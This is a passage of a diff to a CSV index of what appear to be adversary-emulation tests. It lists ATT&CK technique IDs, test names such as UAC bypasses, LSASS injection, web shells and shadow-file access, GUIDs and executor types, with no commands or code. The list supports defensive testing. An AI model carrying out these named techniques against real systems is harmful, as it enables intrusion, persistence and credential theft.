svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell -privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt -privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt -privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell -privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell -privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt -privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell -privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell -privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt -privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt -privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt -privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell -privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell -privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell -privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt -privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell -privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell -privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh -privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt -privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell -privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh -privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell -privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell -privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt -privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt -privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell -privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell -persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt -persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell -persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell -persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt -persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt -persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell -persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell -persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt -persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell -persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt -persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual -persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell -persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt -persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt -persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt -persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt -persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell -persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell -persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt -persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt -persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash -persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash -persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt -persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell -persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash -persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt -persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt -persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt -persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt -persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt -persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt -persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt -persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt -persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell -persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt -persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt -persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell -persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell -persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt -persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt -persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt -persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell -persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell -persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell -persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt -persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell -persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell -persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt -persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt -persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell -persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash -persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash -persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt -persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell -persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt -persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt -persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell -persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell -persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell -persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh @@ -292,6 +100,105 @@ collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell +privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt +privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt +privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt +privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell +privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell +privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt +privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell +privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell +privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt +privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt +privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt +privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt +privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt +privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt +privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt +privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell +privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt +privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell +privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell +privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup 